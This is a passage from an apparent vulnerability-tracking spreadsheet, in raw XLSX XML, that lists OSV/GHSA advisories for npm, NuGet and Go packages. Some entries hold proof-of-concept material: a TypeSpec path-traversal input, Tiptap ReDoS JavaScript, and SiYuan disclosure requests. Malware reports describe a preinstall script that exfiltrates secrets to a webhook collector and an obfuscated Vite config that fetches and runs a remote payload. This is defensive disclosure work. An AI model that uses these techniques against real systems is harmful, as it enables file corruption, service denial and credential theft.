The fix was released in Astro 7.2.8, which requires Sharp 0.35.4.</t></is></c><c r="T87" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2</t></is></c></row><row r="88"><c r="A88" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B88" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C88" s="5" t="inlineStr"><is><t>GHSA-2q42-4q24-7rgv</t></is></c><c r="D88" s="5" t="inlineStr" /><c r="E88" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F88" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G88" s="5" t="inlineStr" /><c r="H88" s="5" t="inlineStr" /><c r="I88" s="5" t="inlineStr" /><c r="J88" s="5" t="inlineStr" /><c r="K88" s="5" t="inlineStr" /><c r="L88" s="5" t="inlineStr"><is><t>npm:@typespec/compiler, npm:@typespec/openapi3</t></is></c><c r="M88" s="5" t="inlineStr" /><c r="N88" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O88" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P88" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q88" s="5" t="inlineStr" /><c r="R88" s="5" t="inlineStr" /><c r="S88" s="5" t="inlineStr"><is><t>### Summary

The `@typespec/openapi3` emitter retains the value of a `@versioned` enum member and interpolates it into the output filename as `{version}` without sanitizing path separators or traversal components. The completed path reaches the compiler's `emitFile()`, which creates the parent directory and writes the file without verifying containment under `emitterOutputDir`.

A crafted declarative `.tsp` input can therefore create or overwrite an OpenAPI-formatted `.yaml` or `.json` file outside the configured output tree, subject to the compiler process's filesystem permissions. No executable TypeSpec extension or attacker-controlled JavaScript is required.

### Affected version

Confirmed on:

- `@typespec/compiler` `1.15.0`
- `@typespec/openapi3` `1.15.0`
- `@typespec/http` `1.15.0`
- `@typespec/versioning` `0.85.0`
- release tag commit `f30cd352f93997e04c75d48c7ace6947a1d5d07a`

The critical `openapi.ts` and `emitter-utils.ts` blobs are unchanged on main commit `365ec52b50b82cd9e1e037de4c6fcd5de7e32e90` as checked on 2026-08-19. No patched version was identified.

### Root cause

The value originates at `packages/openapi3/src/openapi.ts:592-608`:

```ts
serviceRecord.versions.push({
  service,
  version: snapshot.version!.value,
  document: document[0],
  diagnostics: document[1],
});
```

It is interpolated without path validation at `openapi.ts:629-641`:

```ts
return interpolatePath(options.outputFile, {
  "openapi-version": specVersion,
  "service-name-if-multiple": multipleService ? getNamespaceFullName(service.type) : undefined,
  "service-name": getNamespaceFullName(service.type),
  "file-type": fileType,
  version,
});
```

The path reaches `emitFile()` at `openapi.ts:392-401`. The sink at `packages/compiler/src/core/emitter-utils.ts:29-39` performs no output-root containment check:

```ts
const outputFolder = getDirectoryPath(options.path);
await program.host.mkdirp(outputFolder);
return await program.host.writeFile(options.path, content);
```

`resolvePath()` joins the template to `emitterOutputDir` before `{version}` is interpolated, so it does not see the attacker-controlled `..` components.

### Proof of concept

The relevant input in `poc/main.tsp` is:

```tsp
@versioned(Versions) namespace Svc;
enum Versions { v1: "../../../../../../../../../../tmp/TYPESPEC_PWNED/pwn" }
```

Run from PowerShell:

```powershell
cd poc
.\run-revalidation.ps1
```

The supplied Docker runner uses a digest-pinned Node base, a committed npm integrity lock, disabled runtime networking, a benign control, a 90-second timeout, and cleanup enforcement.

Observed in the preserved identity-locked replay (`1/1` attack and `1/1` negative control):

```text
negative_before=02dc7d056c2f773e56e2c1849947888b039f127ddd630c0bd76a5d7a9ca29cbd
negative_after=02dc7d056c2f773e56e2c1849947888b039f127ddd630c0bd76a5d7a9ca29cbd
attack_before=7a8067bc04e42a025de90fd7aff9be4df59f005d192f2116eecfb107d7bffd78
attack_after=2992b399c1573c9bd2130794f8554c4026bf425861f74e78b5d89ae0324b5e38
outside_file_head=openapi: 3.0.0
inside_attack_files=
```

The benign version preserved the outside canary. The crafted version replaced it with emitted OpenAPI content, and no attack output file remained under `tsp-output`.

### Impact and constraints

Proven impact is out-of-directory YAML/JSON creation or overwrite. The attacker can influence the traversal, final basename, and many strings in the OpenAPI-structured content. The extension is constrained to the selected emitter format, content is not arbitrary bytes, and the target must be writable.

This report demonstrates file corruption. Denial of service is a potential impact when a writable critical file is targeted. It does not claim file disclosure, arbitrary-byte write, deployment takeover, or code execution by a downstream consumer.

### Suggested remediation

After every filename token has been interpolated, resolve the completed destination against `emitterOutputDir` and reject any non-descendant using path-component-aware comparison. Reject or slugify absolute paths, path separators, and traversal components in spec-derived filename tokens. Add regression cases for POSIX and Windows separators, absolute values, sibling-prefix paths, and benign semantic versions.</t></is></c><c r="T88" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv</t></is></c></row><row r="89"><c r="A89" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B89" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C89" s="5" t="inlineStr"><is><t>GHSA-2xp9-vwfh-vxw4</t></is></c><c r="D89" s="5" t="inlineStr" /><c r="E89" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F89" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G89" s="5" t="inlineStr" /><c r="H89" s="5" t="inlineStr" /><c r="I89" s="5" t="inlineStr" /><c r="J89" s="5" t="inlineStr" /><c r="K89" s="5" t="inlineStr" /><c r="L89" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M89" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N89" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O89" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P89" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q89" s="5" t="inlineStr" /><c r="R89" s="5" t="inlineStr" /><c r="S89" s="5" t="inlineStr"><is><t>A vulnerability in the underlying `libheif` library used by `sharp` which Next.js uses for image optimization can lead to remote code execution when AVIF files are optimized.

Until a fix has propagated, optimization of AVIF files is disabled.</t></is></c><c r="T89" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4</t></is></c></row><row r="90"><c r="A90" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B90" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C90" s="5" t="inlineStr"><is><t>GHSA-38hw-f37p-99jj</t></is></c><c r="D90" s="5" t="inlineStr" /><c r="E90" s="5" t="inlineStr" /><c r="F90" s="5" t="inlineStr" /><c r="G90" s="5" t="inlineStr" /><c r="H90" s="5" t="inlineStr" /><c r="I90" s="5" t="inlineStr" /><c r="J90" s="5" t="inlineStr" /><c r="K90" s="5" t="inlineStr" /><c r="L90" s="5" t="inlineStr"><is><t>npm:i18nexus</t></is></c><c r="M90" s="5" t="inlineStr" /><c r="N90" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O90" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P90" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q90" s="5" t="inlineStr" /><c r="R90" s="5" t="inlineStr" /><c r="S90" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: ghsa-malware (37d8dfb4ceaec110414441ebad5da37dad342ef653a20499504385d9db1ffdac)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90" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16045</t></is></c></row><row r="91"><c r="A91" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B91" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C91" s="5" t="inlineStr"><is><t>GHSA-3j7p-44mj-76hx</t></is></c><c r="D91" s="5" t="inlineStr" /><c r="E91" s="5" t="inlineStr" /><c r="F91" s="5" t="inlineStr" /><c r="G91" s="5" t="inlineStr" /><c r="H91" s="5" t="inlineStr" /><c r="I91" s="5" t="inlineStr" /><c r="J91" s="5" t="inlineStr" /><c r="K91" s="5" t="inlineStr" /><c r="L91" s="5" t="inlineStr"><is><t>npm:krdpass-auth-react-native</t></is></c><c r="M91" s="5" t="inlineStr" /><c r="N91" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O91" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P91" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q91" s="5" t="inlineStr" /><c r="R91" s="5" t="inlineStr" /><c r="S91" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3a74ab9e45d4f67b40e21dc7491aff1979b4bf79be24bc49b8588916c18b847f)
package.json declares a preinstall script (preinstall.js) that runs automatically on `npm install`. The script collects os.hostname(), os.userInfo(), homedir, internal IP addresses, CI/repository identifiers (GITHUB_REPOSITORY, CI_PROJECT_PATH, JENKINS_URL, etc.), parent package.json metadata, and enumerates process.env keys matching /(TOKEN|KEY|SECRET|PASS|AUTH|CRED|AWS|AZURE|GCP|NPM|GITHUB|GITLAB|API)/i, then POSTs the payload to a hardcoded anonymous collector at https://webhook.site/5ba4d4a7-b977-4bb8-b26e-517b46271316. Bulk env-name enumeration and internal-network / CI-identifier collection are outside any documented purpose of a React Native auth library and disclose to a remote party which credentials exist on the installer or CI runner and how the host is situated. The manifest additionally lists the package's own name (krdpass-auth-react-native ^1.6.0) as one of its dependencies, causing npm to resolve and execute the lifecycle hooks of future self-published versions during install.

## Source: ghsa-malware (802615c8d05ade7426df3338956dc9f1e50c4bfdbb4890b873a978859fa2a537)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91" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16042</t></is></c></row><row r="92"><c r="A92" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B92" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C92" s="5" t="inlineStr"><is><t>GHSA-4qhr-qf46-fcrx</t></is></c><c r="D92" s="5" t="inlineStr" /><c r="E92" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F92" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G92" s="5" t="inlineStr" /><c r="H92" s="5" t="inlineStr" /><c r="I92" s="5" t="inlineStr" /><c r="J92" s="5" t="inlineStr" /><c r="K92" s="5" t="inlineStr" /><c r="L92" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M92" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N92" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O92" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P92" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q92" s="5" t="inlineStr" /><c r="R92" s="5" t="inlineStr" /><c r="S92" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-63gh-g2x5-x69v. This link is maintained to preserve external references.

### Original Description
Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T92" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx</t></is></c></row><row r="93"><c r="A93" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B93" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C93" s="5" t="inlineStr"><is><t>GHSA-57v5-wqx3-cgj4</t></is></c><c r="D93" s="5" t="inlineStr" /><c r="E93" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F93" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G93" s="5" t="inlineStr" /><c r="H93" s="5" t="inlineStr" /><c r="I93" s="5" t="inlineStr" /><c r="J93" s="5" t="inlineStr" /><c r="K93" s="5" t="inlineStr" /><c r="L93" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M93" s="5" t="inlineStr"><is><t>0.0.0-20260726004013-64c26e74bb82</t></is></c><c r="N93" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O93" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P93" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q93" s="5" t="inlineStr" /><c r="R93" s="5" t="inlineStr" /><c r="S93" s="5" t="inlineStr"><is><t>### Scope note (please read first)

This endpoint does not exist in v3.7.3 or on master. It was introduced on the development branch by commit `acfc02ee8` ("Improve database field visibility across views", #11020) and is live on `v3.7.4-alpha.1`, so it will ship in v3.7.4 unless gated first. No released stable version is affected.

### Summary

`/api/av/getAttributeViewFieldViews` is registered with `CheckAuth` only and applies no publish-access filtering. Given a database `avID`, it returns the complete view structure of that database: every view's name, icon, layout type and the per-field `Hidden` flag, regardless of whether the caller is authorized to see that database or those views.

The route registered immediately before it, `getAttributeViewKeys`, does gate reader roles.

### Details

| Item | Detail |
|---|---|
| Route | `kernel/api/router.go:530` `POST /api/av/getAttributeViewFieldViews` → `model.CheckAuth` → `getAttributeViewFieldViews` |
| Middleware | `CheckAuth` only, no `CheckReadonly`, no `CheckAdminRole` |
| Guard in handler | None. Greps for `IsReadOnlyRoleContext`, `publishAccess` and `Filter*` all return zero matches |
| Exposed | For each entry in `attrView.Views`: `ID`, `Icon`, `Name`, `Type`, and the `Hidden` flag for the requested field |
| Introduced by | `acfc02ee8` (feature), dev branch only |

**The leak path.** The handler binds `avID` and `keyID`, validating them against the ID pattern only, then calls `GetAttributeViewFieldViews(avID, keyID)`. That function calls `av.ParseAttributeView(avID)`, which reads the database's storage file directly by identifier. There is no ownership check and no publish-access check anywhere on the path. The result is a per-view record for every view the database defines.

What a reader learns is author-written: view names are typed by the user, and layout type distinguishes a table from a gallery or kanban. The `Hidden` flag additionally reveals, per view, which fields the author chose to conceal.

**Guarded sibling, one route earlier.** `getAttributeViewKeys` (`kernel/api/router.go:529`) is also reader-reachable and does gate:

```go
if model.IsReadOnlyRoleContext(c) {
    blockAttributeViewKeys = model.FilterBlockAttributeViewKeysByPublishAccess(c, publishAccess, ...)
}
```

The new route at 530 applies nothing equivalent.

This is worth flagging as more than an isolated omission. `acfc02ee8` added a new reader-reachable attribute-view endpoint during the same development cycle in which the surrounding attribute-view endpoints were being hardened. The same pattern produced an earlier exposure: `f2d966659`, which added encrypted-notebook unlock status for plugin consumption, created a reader-reachable disclosure on a surface that was otherwise being tightened. A check on new reader-reachable routes against the gating applied to their registered neighbours would catch this class before release.

**Reachability, stated honestly.** The endpoint requires a valid `avID` and `keyID`. `renderAttributeView` supplies both to a reader for any database embedded in a document the reader can access. The realistic target is therefore a partially-published database: the document publishes one view, and this endpoint enumerates the existence, name, layout type and hidden-field configuration of the database's other views, including views the author did not publish. Against a database with no reader-accessible surface at all, obtaining the identifiers is harder, particularly since the `getAttributeViewKeysByID` enumeration path was closed on the development branch. The severity below reflects that constraint rather than a worst case.

### Proof of Concept

Precondition: `v3.7.4-alpha.1` build, publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. A database embedded in a reader-accessible document, with at least one additional view that is not published.

Step 1, obtain the identifiers through the reader-accessible path:

```
POST http://127.0.0.1:6808/api/av/renderAttributeView
{"id":"&lt;block id of the embedded database in a published doc&gt;"}

→ 200, returns the published view together with its key identifiers
```

Step 2, enumerate the rest of the database's views:

```
POST http://127.0.0.1:6808/api/av/getAttributeViewFieldViews
{"avID":"&lt;avID from step 1&gt;","keyID":"&lt;keyID from step 1&gt;"}

→ 200, returns a record per view: ID, Icon, Name, Type, Hidden
```

The response includes views that were never published, disclosing their author-written names, their layout types, and which field is hidden in each.

### Impact

An anonymous reader in publish mode, or any publish `RoleReader`, can enumerate the full view structure of a database when only part of that database is published. View names are author-written free text and frequently describe the data they filter, so this discloses the existence and subject matter of unpublished views. The per-field `Hidden` flags additionally reveal the author's concealment choices across those views. Confidentiality only, with no integrity or availability impact, and bounded by the reader needing identifiers obtainable from a reader-accessible database.

### Suggested fix

Gate the handler for read-only roles, mirroring `getAttributeViewKeys`: when `IsReadOnlyRoleContext(c)` holds, resolve the block that owns the `avID` and apply the publish-access check before returning any view record, or filter the returned set through the same `FilterBlockAttributeViewKeysByPublishAccess` path its neighbour uses.</t></is></c><c r="T93" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-57v5-wqx3-cgj4</t></is></c></row><row r="94"><c r="A94" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B94" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C94" s="5" t="inlineStr"><is><t>GHSA-8rcc-9ggm-659p</t></is></c><c r="D94" s="5" t="inlineStr" /><c r="E94" s="5" t="inlineStr" /><c r="F94" s="5" t="inlineStr" /><c r="G94" s="5" t="inlineStr" /><c r="H94" s="5" t="inlineStr" /><c r="I94" s="5" t="inlineStr" /><c r="J94" s="5" t="inlineStr" /><c r="K94" s="5" t="inlineStr" /><c r="L94" s="5" t="inlineStr"><is><t>npm:@usemosaik/template-react-js</t></is></c><c r="M94" s="5" t="inlineStr" /><c r="N94" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O94" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P94" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q94" s="5" t="inlineStr" /><c r="R94" s="5" t="inlineStr" /><c r="S94" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3174ac7cecbc1869ae5ac87ea585de744f6b7d17b8c089b746384c2b7e2355a3)
This template package ships files/vite.config.js which, after a benign Vite header, appends ~26KB of heavily obfuscated code (obfuscator.io-style string-array with rotation dispatcher, hex payloads XOR-decoded at runtime with key 0xA2, arithmetic-hidden numeric literals). When the scaffolded project is run via `vite` / `npm run dev`, the config executes a `run()` routine that queries Ethereum JSON-RPC endpoints (`eth_getBlockByNumber`, `eth_getTransactionCount`) against a hardcoded sender address to resolve a command-and-control IP hidden in on-chain transaction data, fetches an XOR-encrypted payload over HTTP, decrypts it, and passes it to both `eval(...)` and `spawn('node', ['-e', payload], {detached: true, stdio: 'ignore', windowsHide: true})`, yielding a hidden detached Node process on the developer's machine. The package's declared `main` (dist/index.js) is inert, so scanners inspecting only the entry point miss the payload; the obfuscation and EtherHiding indirection exist solely to conceal the remote-execution chain from static review. Execution fires the first time a developer runs the scaffolded project generated from this template, giving full RCE on the developer's host.

## Source: ghsa-malware (9cb614be24802762692ee3d58173981e3c20bdebe4fabd6846ab71671568d4ca)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94" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16047</t></is></c></row><row r="95"><c r="A95" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B95" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C95" s="5" t="inlineStr"><is><t>GHSA-9cfw-xh4g-cc2f</t></is></c><c r="D95" s="5" t="inlineStr" /><c r="E95" s="5" t="inlineStr" /><c r="F95" s="5" t="inlineStr" /><c r="G95" s="5" t="inlineStr" /><c r="H95" s="5" t="inlineStr" /><c r="I95" s="5" t="inlineStr" /><c r="J95" s="5" t="inlineStr" /><c r="K95" s="5" t="inlineStr" /><c r="L95" s="5" t="inlineStr"><is><t>npm:i18nexus-tools</t></is></c><c r="M95" s="5" t="inlineStr" /><c r="N95" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O95" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P95" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q95" s="5" t="inlineStr" /><c r="R95" s="5" t="inlineStr" /><c r="S95" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (558344f06c374c5eff9c870250d63a5e9f784ffe23f91182154d9c66c441ee0b)
The package was found to contain malicious code or consuming dependency that contains malicious code

## Source: ghsa-malware (4708373dfb7211317f4ebae7bd11027043840e6db7a9f2d9aa3385611a2fdad8)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95" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16046</t></is></c></row><row r="96"><c r="A96" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B96" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C96" s="5" t="inlineStr"><is><t>GHSA-f4f2-cqqp-jcrx</t></is></c><c r="D96" s="5" t="inlineStr" /><c r="E96" s="5" t="inlineStr" /><c r="F96" s="5" t="inlineStr" /><c r="G96" s="5" t="inlineStr" /><c r="H96" s="5" t="inlineStr" /><c r="I96" s="5" t="inlineStr" /><c r="J96" s="5" t="inlineStr" /><c r="K96" s="5" t="inlineStr" /><c r="L96" s="5" t="inlineStr"><is><t>npm:@web2apk/baileys</t></is></c><c r="M96" s="5" t="inlineStr" /><c r="N96" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O96" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P96" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q96" s="5" t="inlineStr" /><c r="R96" s="5" t="inlineStr" /><c r="S96" s="5" t="inlineStr"><is><t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (1ad4c3329ebb2fdeb3b9ddc93abcb5f3dab6773f7a7999ff96d063d49edc04d9)
The package was found to contain malicious code or consuming dependency that contains malicious code

## Source: ghsa-malware (23d279de5770039164036b3717fa8188b73601e773d8647f1a4e1b6ac59c5a17)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is></c><c r="T96" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16043</t></is></c></row><row r="97"><c r="A97" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B97" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C97" s="5" t="inlineStr"><is><t>GHSA-j95f-988m-3j2f</t></is></c><c r="D97" s="5" t="inlineStr" /><c r="E97" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F97" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G97" s="5" t="inlineStr" /><c r="H97" s="5" t="inlineStr" /><c r="I97" s="5" t="inlineStr" /><c r="J97" s="5" t="inlineStr" /><c r="K97" s="5" t="inlineStr" /><c r="L97" s="5" t="inlineStr"><is><t>npm:@tiptap/core</t></is></c><c r="M97" s="5" t="inlineStr"><is><t>3.30.5</t></is></c><c r="N97" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O97" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P97" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q97" s="5" t="inlineStr" /><c r="R97" s="5" t="inlineStr" /><c r="S97" s="5" t="inlineStr"><is><t>## Summary

`@tiptap/core` contains two quadratic regular-expression denial-of-service paths in its default Markdown attribute parsers. Pandoc-style block attributes use two unanchored greedy expressions that rescan repeated `__QUOTED_0` prefixes. Inline shortcode attributes use another unanchored greedy key expression that rescans a long word-character run when no equals sign follows.

The public `createAtomBlockMarkdownSpec` and `createBlockMarkdownSpec` helpers call the vulnerable Pandoc-style parser; `createInlineMarkdownSpec` calls the separately vulnerable shortcode parser. Using unmodified npm 3.29.2, a complete 20,508-byte atom-block token took approximately 1.40 seconds while an equal-length control took 0.29 ms. A complete 32,776-byte inline token took approximately 2.21 seconds while its equal-length control took 0.19 ms. Current repository `main` commit `5158212970344952dd9918b6a44bfb400d7fb6c1` retains both expressions.

## Block attribute root cause

`packages/core/src/utilities/markdown/attributeUtils.ts` uses both `matchAll` and `replace` with `/([a-zA-Z][\w-]*)\s*=\s*(__QUOTED_\d+__)/g`. The candidate is `'__QUOTED_0'.repeat(n) + '__QUOTED_0__'`. There are no quotes, so the preceding replacement leaves it unchanged. At each `Q`, the greedy key-name expression consumes the remaining word-character run, the required equals sign fails, and the unanchored engine restarts at the next `Q`. This yields `O(n^2)` work, and the cleanup pass repeats it.

A complete public-API proof is:

```js
import { createAtomBlockMarkdownSpec } from '@tiptap/core'
const tokenizer = createAtomBlockMarkdownSpec({ nodeName: 'probe' }).markdownTokenizer
const attack = '__QUOTED_0'.repeat(2048) + '__QUOTED_0__'
const source = `:::probe {${attack}} :::\n`
const started = performance.now()
tokenizer.tokenize(source, [], {})
console.log(performance.now() - started)
```

Measured complete-tokenizer timings were 6.23, 23.12, 88.93, 369.10, and 1,400.17 ms at 1,308, 2,588, 5,148, 10,268, and 20,508 bytes. Equal-length controls took 0.07 to 0.29 ms. The directly exported parser took 5,645.71 ms at 40,972 bytes while its control took 0.64 ms.

## Inline attribute root cause

`packages/core/src/utilities/markdown/createInlineMarkdownSpec.ts` uses `/(\w+)=(?:"([^"]*)"|'([^']*)')/g`. For a long word-character run without an equals sign, `\w+` consumes the remaining suffix, `=` fails, and the unanchored engine restarts at the next character. The default inline tokenizer extracts this attacker string directly from a syntactically complete `[shortcode attributes]` token.

```js
import { createInlineMarkdownSpec } from '@tiptap/core'
const tokenizer = createInlineMarkdownSpec({ nodeName: 'probe', selfClosing: true }).markdownTokenizer
const source = `[probe ${'0'.repeat(32768)}]`
const started = performance.now()
tokenizer.tokenize(source, [], {})
console.log(performance.now() - started)
```

At 1,032, 2,056, 4,104, 8,200, 16,392, and 32,776 bytes, candidates took 3.24, 12.88, 54.82, 136.91, 557.83, and 2,209.47 ms. Equal-length hyphen controls took 0.02 to 0.19 ms.

## Impact

Applications parsing attacker-controlled Markdown with these helpers can have a browser main thread, server event loop, or worker blocked by a small input. Persisted documents can repeatedly freeze clients; repeated requests can exhaust server-side parsing capacity. Editors that only consume validated ProseMirror JSON and never invoke the Markdown parsing path are not directly affected through document content.

## History and remediation

Commit `35645d94ae9cd73448a564104c2e08f64e9564bc` introduced both parsers on 14 October 2025, first released in 3.7.0. Versions 3.7.0 through current 3.29.2 and current `main` remain affected. Official issue, PR, and repository-advisory searches found no duplicate.

Require a start-of-string or whitespace boundary before both key-value parsers, and preferably replace the multi-pass placeholder and shortcode regex designs with deterministic single-pass tokenizers. Keep quoted values out-of-band so attacker input cannot collide with predictable `__QUOTED_n__` placeholders. Add complete block and inline Markdown-tokenizer scaling regressions with equal-length controls.

Please credit GitHub user `joostgrunwald` as finder/reporter.</t></is></c><c r="T97" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f</t></is></c></row><row r="98"><c r="A98" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B98" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C98" s="5" t="inlineStr"><is><t>GHSA-mqvm-gmc4-6rv2</t></is></c><c r="D98" s="5" t="inlineStr" /><c r="E98" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F98" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G98" s="5" t="inlineStr" /><c r="H98" s="5" t="inlineStr" /><c r="I98" s="5" t="inlineStr" /><c r="J98" s="5" t="inlineStr" /><c r="K98" s="5" t="inlineStr" /><c r="L98" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M98" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N98" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O98" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P98" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q98" s="5" t="inlineStr" /><c r="R98" s="5" t="inlineStr" /><c r="S98" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-527h-q9f6-p7qx. This link is maintained to preserve external references.

### Original Description
Heap-based buffer overflow in .NET and Visual Studio allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T98" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2</t></is></c></row><row r="99"><c r="A99" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B99" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C99" s="5" t="inlineStr"><is><t>GHSA-q72m-f2r4-w4cw</t></is></c><c r="D99" s="5" t="inlineStr" /><c r="E99" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F99" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G99" s="5" t="inlineStr" /><c r="H99" s="5" t="inlineStr" /><c r="I99" s="5" t="inlineStr" /><c r="J99" s="5" t="inlineStr" /><c r="K99" s="5" t="inlineStr" /><c r="L99" s="5" t="inlineStr"><is><t>NuGet:Microsoft.DiaSymReader.Native</t></is></c><c r="M99" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N99" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O99" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P99" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q99" s="5" t="inlineStr" /><c r="R99" s="5" t="inlineStr" /><c r="S99" s="5" t="inlineStr"><is><t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-2j8r-3c22-8565. This link is maintained to preserve external references.

### Original Description
